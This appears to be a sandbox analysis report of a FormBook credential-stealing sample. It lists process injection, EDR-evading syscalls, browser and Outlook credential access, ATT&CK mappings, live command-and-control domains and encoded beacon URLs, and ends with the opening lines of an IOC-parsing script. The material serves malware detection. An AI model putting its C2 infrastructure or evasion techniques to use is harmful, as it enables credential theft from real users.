                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe  Code function: 0_2_00630B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,  0_2_00630B62
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe  Code function: 0_2_00602622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,  0_2_00602622
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe  Code function: 0_2_005F083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,  0_2_005F083F
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe  Code function: 0_2_005F09D5 SetUnhandledExceptionFilter,  0_2_005F09D5
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe  Code function: 0_2_005F0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,  0_2_005F0C21

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe  NtCreateMutant: Direct from: 0x774635CC
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe  NtWriteVirtualMemory: Direct from: 0x77462E3C
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe  NtMapViewOfSection: Direct from: 0x77462D1C
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe  NtResumeThread: Direct from: 0x774636AC
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe  NtProtectVirtualMemory: Direct from: 0x77462F9C
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe  NtSetInformationProcess: Direct from: 0x77462C5C
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe  NtSetInformationThread: Direct from: 0x774563F9
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe  NtClose: Direct from: 0x77457B2E
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe  NtNotifyChangeKey: Direct from: 0x77463C2C
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe  NtAllocateVirtualMemory: Direct from: 0x77462BFC
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe  NtQueryInformationProcess: Direct from: 0x77462C26
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe  NtResumeThread: Direct from: 0x77462FBC
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe  NtReadFile: Direct from: 0x77462ADC
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe  NtQuerySystemInformation: Direct from: 0x77462DFC
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe  NtDelayExecution: Direct from: 0x77462DDC
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe  NtAllocateVirtualMemory: Direct from: 0x77463C9C
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe  NtClose: Direct from: 0x77462B6C
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe  NtCreateUserProcess: Direct from: 0x7746371C
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe  NtWriteVirtualMemory: Direct from: 0x7746490C
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe  NtAllocateVirtualMemory: Direct from: 0x774648EC
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe  NtQuerySystemInformation: Direct from: 0x774648CC
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe  NtQueryVolumeInformationFile: Direct from: 0x77462F2C
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe  NtReadVirtualMemory: Direct from: 0x77462E8C
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe  NtCreateKey: Direct from: 0x77462C6C
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe  NtSetInformationThread: Direct from: 0x77462B4C
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe  NtQueryAttributesFile: Direct from: 0x77462E6C
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe  NtDeviceIoControlFile: Direct from: 0x77462AEC
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe  NtOpenSection: Direct from: 0x77462E0C
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe  NtCreateFile: Direct from: 0x77462FEC
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe  NtOpenFile: Direct from: 0x77462DCC
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe  NtQueryInformationToken: Direct from: 0x77462CAC
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe  NtTerminateThread: Direct from: 0x77462FCC
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe  NtAllocateVirtualMemory: Direct from: 0x77462BEC
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe  NtOpenKeyEx: Direct from: 0x77462B9C
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe  Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: NULL target: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: NULL target: C:\Windows\SysWOW64\TCPSVCS.EXE protection: execute and read and write
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE  Section loaded: NULL target: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe protection: read write
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE  Section loaded: NULL target: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE  Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE  Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE  Thread register set: target process: 7404
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE  Thread APC queued: target process: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe  Memory written: C:\Windows\SysWOW64\svchost.exe base: 30CB008
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe  Code function: 0_2_00631201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,  0_2_00631201
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe  Code function: 0_2_00612BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,  0_2_00612BA5
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe  Code function: 0_2_0063B226 SendInput,keybd_event,  0_2_0063B226
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe  Code function: 0_2_006522DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,  0_2_006522DA
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe  Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\ofZiNLLKZU.exe"
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe  Process created: C:\Windows\SysWOW64\TCPSVCS.EXE "C:\Windows\SysWOW64\TCPSVCS.EXE"
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE  Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe  Code function: 0_2_00630B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,  0_2_00630B62
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe  Code function: 0_2_00631663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,  0_2_00631663
                Source: ofZiNLLKZU.exe  Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: ofZiNLLKZU.exe, kwRriiLHUBrBci.exe, 00000004.00000002.3902106882.0000000001681000.00000002.00000001.00040000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000004.00000000.1650057348.0000000001680000.00000002.00000001.00040000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000000.1805374626.0000000001220000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: Shell_TrayWnd
                Source: kwRriiLHUBrBci.exe, 00000004.00000002.3902106882.0000000001681000.00000002.00000001.00040000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000004.00000000.1650057348.0000000001680000.00000002.00000001.00040000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000000.1805374626.0000000001220000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: Progman
                Source: kwRriiLHUBrBci.exe, 00000004.00000002.3902106882.0000000001681000.00000002.00000001.00040000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000004.00000000.1650057348.0000000001680000.00000002.00000001.00040000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000000.1805374626.0000000001220000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: 0Program Manager
                Source: kwRriiLHUBrBci.exe, 00000004.00000002.3902106882.0000000001681000.00000002.00000001.00040000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000004.00000000.1650057348.0000000001680000.00000002.00000001.00040000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000000.1805374626.0000000001220000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe  Code function: 0_2_005F0698 cpuid  0_2_005F0698
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe  Code function: 0_2_00648195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,  0_2_00648195
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe  Code function: 0_2_0062D27A GetUserNameW,  0_2_0062D27A
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe  Code function: 0_2_0060B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,  0_2_0060B952
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe  Code function: 0_2_005D42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,  0_2_005D42DE

                Stealing of Sensitive Information

                Source: Yara match  File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match  File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match  File source: 00000005.00000002.3900696034.0000000002600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: 00000005.00000002.3900973185.0000000002790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: 00000002.00000002.1724553623.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: 00000002.00000002.1724963912.0000000003790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: 00000006.00000002.3905770259.0000000004F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: 00000002.00000002.1725326786.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: 00000005.00000002.3900101760.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: 00000004.00000002.3902676049.0000000002C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE  File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE  File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE  Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: ofZiNLLKZU.exe  Binary or memory string: WIN_81
                Source: ofZiNLLKZU.exe  Binary or memory string: WIN_XP
                Source: ofZiNLLKZU.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: ofZiNLLKZU.exe  Binary or memory string: WIN_XPe
                Source: ofZiNLLKZU.exe  Binary or memory string: WIN_VISTA
                Source: ofZiNLLKZU.exe  Binary or memory string: WIN_7
                Source: ofZiNLLKZU.exe  Binary or memory string: WIN_8

                Remote Access Functionality

                Source: Yara match  File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match  File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match  File source: 00000005.00000002.3900696034.0000000002600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: 00000005.00000002.3900973185.0000000002790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: 00000002.00000002.1724553623.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: 00000002.00000002.1724963912.0000000003790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: 00000006.00000002.3905770259.0000000004F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: 00000002.00000002.1725326786.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: 00000005.00000002.3900101760.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: 00000004.00000002.3902676049.0000000002C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe  Code function: 0_2_00651204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,  0_2_00651204
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe  Code function: 0_2_00651806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,  0_2_00651806
                MITRE ATT&CK Matrix (tactics as columns; only techniques with signature hits are listed, hit count in parentheses; unflagged matrix cells omitted)

                Reconnaissance: no hits
                Resource Development: no hits
                Initial Access: Valid Accounts (2)
                Execution: Native API (1)
                Persistence: DLL Side-Loading (1), Valid Accounts (2)
                Privilege Escalation: Exploitation for Privilege Escalation (1), Abuse Elevation Control Mechanism (1), DLL Side-Loading (1), Valid Accounts (2), Access Token Manipulation (21), Process Injection (412)
                Defense Evasion: Disable or Modify Tools (1), Deobfuscate/Decode Files or Information (1), Abuse Elevation Control Mechanism (1), Obfuscated Files or Information (3), DLL Side-Loading (1), Valid Accounts (2), Virtualization/Sandbox Evasion (12), Access Token Manipulation (21), Process Injection (412)
                Credential Access: OS Credential Dumping (1), Input Capture (21)
                Discovery: System Time Discovery (2), Account Discovery (1), File and Directory Discovery (2), System Information Discovery (116), Security Software Discovery (241), Virtualization/Sandbox Evasion (12), Process Discovery (3), Application Window Discovery (11), System Owner/User Discovery (1)
                Lateral Movement: no hits
                Collection: Archive Collected Data (1), Data from Local System (1), Email Collection (1), Input Capture (21), Clipboard Data (3)
                Command and Control: Ingress Tool Transfer (4), Encrypted Channel (1), Non-Application Layer Protocol (4), Application Layer Protocol (4)
                Exfiltration: no hits
                Impact: System Shutdown/Reboot (1)
                Behavior Graph ID: 1587873  Sample: ofZiNLLKZU.exe  Startdate: 10/01/2025  Architecture: WINDOWS  Score: 100

                Start node: contacts www.binjai77rtp11f.xyz, www.zrichiod-riech.sbs and 17 other IPs or domains; signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected FormBook; 3 other signatures; Performs DNS queries to domains with low reputation
                ofZiNLLKZU.exe (started): Binary is likely a compiled AutoIt script file; Found API chain indicative of sandbox detection; Writes to foreign memory regions; 2 other signatures
                svchost.exe (started by ofZiNLLKZU.exe): Maps a DLL or memory area into another process
                kwRriiLHUBrBci.exe (injected by svchost.exe): Found direct / indirect Syscall (likely to bypass EDR)
                TCPSVCS.EXE (started by kwRriiLHUBrBci.exe): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                kwRriiLHUBrBci.exe (injected by TCPSVCS.EXE): contacts rokeyfashion.store 103.159.36.66 (ports 49729, 49730, 49731; TWIDC-AS-APTWIDCLimitedHK; unknown), b1-3-r111.kunlundns.top 101.32.205.61 (ports 49725, 49726, 49727; TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN; China) and 7 other IPs or domains; Found direct / indirect Syscall (likely to bypass EDR)
                firefox.exe (started by TCPSVCS.EXE)

                Source  Detection  Scanner  Label
                ofZiNLLKZU.exe  71%  ReversingLabs  Win32.Trojan.AutoitInject
                ofZiNLLKZU.exe  64%  Virustotal
                ofZiNLLKZU.exe  100%  Joe Sandbox ML
                No Antivirus matches
Contacted domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.zrichiod-riech.sbs | 188.114.96.3 | true | true | (none) | unknown
absseguridad.online | 84.32.84.32 | true | true | (none) | unknown
www.showyourstyle.top | 69.57.163.64 | true | true | (none) | unknown
www.lucelight.info | 103.168.172.37 | true | true | (none) | unknown
rokeyfashion.store | 103.159.36.66 | true | true | (none) | unknown
www.binjai77rtp11f.xyz | 104.21.28.65 | true | true | (none) | unknown
b1-3-r111.kunlundns.top | 101.32.205.61 | true | true | (none) | unknown
www.vietnamtour.pro | 172.67.138.138 | true | true | (none) | unknown
www.daystarcafe.net | 208.91.197.27 | true | true | (none) | unknown
www.3nhc3a.top | 20.2.208.137 | true | false | (none) | unknown
www.rwse6wjx.sbs | unknown | unknown | false | (none) | unknown
www.absseguridad.online | unknown | unknown | false | (none) | unknown
www.rokeyfashion.store | unknown | unknown | false | (none) | unknown
Contacted URLs
Each URL below is flagged Malicious: true, with Antivirus Detection "Avira URL Cloud: safe" and Reputation: unknown:
http://www.showyourstyle.top/zbqa/?irCxl6=VL/7+LncUKg93smxMKx16PJyQUb9eyDUwLSrEzeHp8x1IkOi8uzSCeY3r5BUse/S3M+vRdZQg/I11o5hNVVA7SQLtfVsXWgzAL3L+IJqGxdPdltrLo2WzEd+oOLSgjkcqA==&0FJ=D00hHLh
http://www.rokeyfashion.store/nfd2/
http://www.lucelight.info/up4e/
http://www.zrichiod-riech.sbs/kf10/?irCxl6=BMr36Ol4rNvSddxqg0HaAfLMG0b3PxYJLrZ3pB2pD+hE5HArYgxCudju8uwut0znVv+lDQdvUK2ZT/OSWW6E73ehYzW1pFh3giqPoWaMqdwg87w/En0YZeFR2W2LB0SR+w==&0FJ=D00hHLh
http://www.binjai77rtp11f.xyz/9fei/?irCxl6=9hwMTPf/o+GewSNr0PZcNyjUpNs4oV11JaaOJ/4hdktbA5fMK3ajxj9W7lKuvaKLl9eyr3kbg9/8Pn7CG+MHPzFPLCnPEL+bBN+DL4U4BkbYG2HsYKvT3cQqMuOVV8lKBQ==&0FJ=D00hHLh
http://www.rwse6wjx.sbs/gtil/?0FJ=D00hHLh&irCxl6=yyp7zDkplnhFTYOX3ExWxIUq0IjfKVeUoM/g1Z3Itn+WrDb/JBNc3lr1wwtaU5LmbkDFl3V0HSUPXljFvyI/43E9pOq5Y7bgQWtruYXflXEVT6YhdPLVpdYAFb3D0RMErQ==
http://www.rwse6wjx.sbs/gtil/
http://www.rokeyfashion.store/nfd2/?irCxl6=Nz4SRZ+ZcsWDvLDLaExFXoqxLF9RdDOa1L87IpfF7DS4rl0CQqW5nKUTlgEwSOCJB6dlUsv6D3EsaGzmyQ5ZB5AOjp44EvTwqJF0vghgjnDPOb2iH8sdTWQtstyoz2bs+w==&0FJ=D00hHLh
http://www.lucelight.info/up4e/?irCxl6=VXc1jWSgqs8x7qdgafwEWVcLTvt60MncsX8sB3hxkBZ1r/WG9R0muDMsDsUoNKEWb3GhLvkp8KOPLwQ4Bi3owHJAbIJD7pBSH8qbt8k3G95dMvpBnol4dqnd3B3JqqcnGw==&0FJ=D00hHLh
http://www.absseguridad.online/3io6/
http://www.vietnamtour.pro/wmxx/
http://www.zrichiod-riech.sbs/kf10/
http://www.showyourstyle.top/zbqa/
http://www.vietnamtour.pro/wmxx/?0FJ=D00hHLh&irCxl6=zdZDiDz9NcDAxdPT/uWXYjOZ7xdg3NSLew0AnBcQq7wq0cWPcv1qrwj1W7YWM/gj4sM+0wouZwjbIFjwenXJ+O4VSQPSXkwvnSmJEYaf1BK13FkupONapGDJTjw9KvkhIA==
http://www.binjai77rtp11f.xyz/9fei/
http://www.absseguridad.online/3io6/?irCxl6=gcX2VOQ36WC77lysui5XZ/m5rPyYNRmqhqSEheNQdnlbGlnbCsY2Ojxac1DjYk++nD1McxY4sUfZTb3NP1oMnhI4fmsR5776EaSkwHcYG6c3TDmsIPc66LvHumOhTsoWEA==&0FJ=D00hHLh
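The contacted URLs above share one structure: a four-character directory (/9fei/, /kf10/, /gtil/, ...), a long base64-looking value under the key irCxl6, and a second parameter 0FJ whose value D00hHLh is the same in every request. The following script is an added example written for this page, not Joe Sandbox tooling and not code from the sample; it takes the URLs as copied from the report (the sample input is constructed from the tables above, with three unrelated URLs from the same memory dumps mixed in), separates full beacons from the truncated memory string and from noise, derives the domain and domain/path IOC lists, finds the query parameter that never changes, and turns that into a regex that matches the beacon skeleton regardless of parameter order. The key names, the 64-byte blob threshold and the four-character path rule are observations from this report only, not a documented FormBook format.

```python
import re
from urllib.parse import urlsplit

# Constructed sample input: URLs copied from this report's URL tables.
# The last three are unrelated strings found in the same memory dumps and
# are included to show that the classifier leaves them alone.
REPORT_URLS = [
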